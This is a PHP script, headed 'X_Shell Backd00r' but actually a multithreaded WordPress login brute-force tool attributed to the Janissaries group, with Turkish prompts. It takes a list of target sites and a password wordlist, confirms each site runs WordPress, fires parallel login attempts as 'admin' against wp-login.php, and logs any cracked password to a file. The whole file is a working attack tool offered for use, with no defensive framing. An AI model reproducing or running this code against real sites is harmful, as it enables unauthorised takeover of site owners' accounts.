[#] hm X_Shell Backd00r [#]

<?php

/*
*  Janissaries Wordpress Brute Force Tool with MultiThread
*  Coded By Burtay
*  contact for questions : admin@burtay.org
*  Script Language : Turkish
*  Janissaries.Org
*  Video Tutorial : http://www.youtube.com/watch?v=dIoVglEZYYU
*/

error_reporting(0);
function multi($site,$postlar,$aranan,$aranan2)
{
  $toplam_post = count($postlar);
  $curl_multi  = curl_multi_init();
  for($i=0;$i<=$toplam_post-1;$i++)
  {
    $curl[$i]  = curl_init();
    curl_setopt($curl[$i],CURLOPT_URL,$site);
    curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);    
    curl_setopt($curl[$i],CURLOPT_HEADER,1);
    curl_setopt($curl[$i],CURLOPT_NOBODY,1);
    curl_setopt($curl[$i],CURLOPT_CONNECTTIMEOUT,20);
    curl_setopt($curl[$i],CURLOPT_TIMEOUT,20);
    curl_setopt($curl[$i],CURLOPT_POST,1);
    curl_setopt($curl[$i],CURLOPT_POSTFIELDS,$postlar[$i]);
    curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,true);
    curl_multi_add_handle($curl_multi,$curl[$i]);
  }
   do
  {
    curl_multi_exec($curl_multi,$durum);
  }
  while($durum>0);
  foreach($curl as $cid => $cson)
  {
    $sonuc[$cid] = curl_multi_getcontent($cson);  
    if(preg_match('/'.$aranan.'/',$sonuc[$cid]) and preg_match('/'.$aranan2.'/',$sonuc[$cid]))
    {
      return $cid+1;
      exit();
    }
  }
  for($i=0;$i<=$toplam_post-1;$i++)
  {
    curl_multi_remove_handle($curl_multi, $curl[$i]); 
    curl_close($curl[$i]); 
  }
  curl_multi_close($curl_multi); 
}

function dogrula($site)
{
  $curl  =  curl_init();
  curl_setopt($curl,CURLOPT_URL,$site);
  curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,20);
  curl_setopt($curl,CURLOPT_TIMEOUT,20);
  $calis  =  curl_exec($curl);
  curl_close($curl);
  if(preg_match('/wp-content/',$calis))
  {
    return true;
  }
  else
  {
    $site = str_replace('http://','',$site);
    echo "[+]".$site." Wordpress Olarak Dogrulanamadi...\n";
    echo "##################################\n\n\n";      
    return false;
  }
}

#-------------------------------------------------------------

echo "[+]Site listenizi Girin...\n";
// $site_list  =  $argv[1];
$site_list    =  fgets(STDIN);
$site_list    =  str_replace("\r\n",'',$site_list);
$site_list    =   trim($site_list);
// $wordlist  =  $argv[2];
echo "[+]Wordlist Dosyaninizi Girin...\n";
$wordlist    =  fgets(STDIN);
$wordlist    =  str_replace("\r\n",'',$wordlist);
$wordlist    =  trim($wordlist);
// $thread    =  $argv[3];
echo "[+]Thread Sayisini Girin...\n";
$thread      =  fgets(STDIN);
$thread      =  str_replace("\r\n",'',$thread);
// $timeout  =  $argv[4];
#----------------------------------------------------------------

$time1      =  time();
$siteler    =  file_get_contents($site_list);
$site_ayir    =  explode("\n",$siteler);
$say1      =  count($site_ayir);
$site_temizle  =  array_values(array_unique($site_ayir));
$say2      =  count($site_temizle);

echo "##################################\n";
echo "Janissaries.Org New Generation Security Forum\n";
echo "##################################\n";
echo "[+]Tarama Basladi\n";
echo "[+]Site Listesi -> $site_list\n";
echo "[+]Wordlist -> $wordlist\n";
echo "[+]Thread Sayisi $thread\n";
echo "[+]Yuklenen Site Sayisi ".count($site_ayir)." \n";
echo "[+]Ayný Siteler Listeden Siliniyor\n";
echo "[+]Tekrar Eden Site Sayisi ".(count($site_ayir) - count($site_temizle))." \n";
echo "[+]Temizleme Sonrasi Site Sayisi ".count($site_temizle)." \n\n";

$saygac  =  0;
foreach($site_temizle as $site)
{
  $saygac++;
  $site  =  trim($site);
  $a     =  "##################################\n";
  $a    .=  "[+]Denenen Site ".$site."  ".$saygac."/".count($site_ayir)."\n";
  echo $a;
  if(!preg_match('/http/',$site)) $site = "http://".$site;
   if( !dogrula($site) )
   {continue;}
  $pass_oku  = file_get_contents($wordlist);
  $ay      = explode("\n",$pass_oku);
  $c  =  "[+]Yuklenen Password Sayisi ".count($ay)." \n";
  $c .=  "[+]Coded By Burtay |||| Janissaries.Org\n";
  echo $c;
  $pass_array    = array_chunk($ay,$thread);
  $thread_count  = count($pass_array);
  $saygac2    = 0;
  for($x=0;$x<=$thread_count-1;$x++)
  {    
    $saygac2  =  $saygac2 + $thread;
    $time3    =  time();
    $postlar  = array();
    foreach($pass_array[$x] as $password)
    {
      $post  =  "log=admin&pwd=".trim($password)."&redirect_to=".urlencode($site."&testcookie=1&wp-submit=Log In");
      array_push($postlar,$post);
    }
    $sonuc = multi( $site."/wp-login.php",$postlar,'wordpress_logged_in','Location');
    if($sonuc != null)
    {
      $time4 = time();
      $b =  "[+]Password Bulundu -> ".$pass_array[$x][$sonuc-1]. "\n";
      $b .= "[+]Sifrenin Kirilma Suresi -> ".($time4-$time3)."\n" ;
      $b .= "##################################\n\n\n";
      echo $b;
      yaz("wordpress_log.txt",$a.$c.$b);
      break;
    }
    elseif($x == $thread_count-1 )
    {
      echo "[+]Password bulunamadi...\n";
      echo "##################################\n\n\n";
    }
    unset($postlar);
  }  
}
$time2  =  time();
echo "Script Tamamlanma Suresi ".($time2 - $time1) ." Saniye";

function yaz($file,$content)
{
  $fopen = fopen($file,'ab');
  fwrite($fopen,$content);
  return $fopen;
}
?>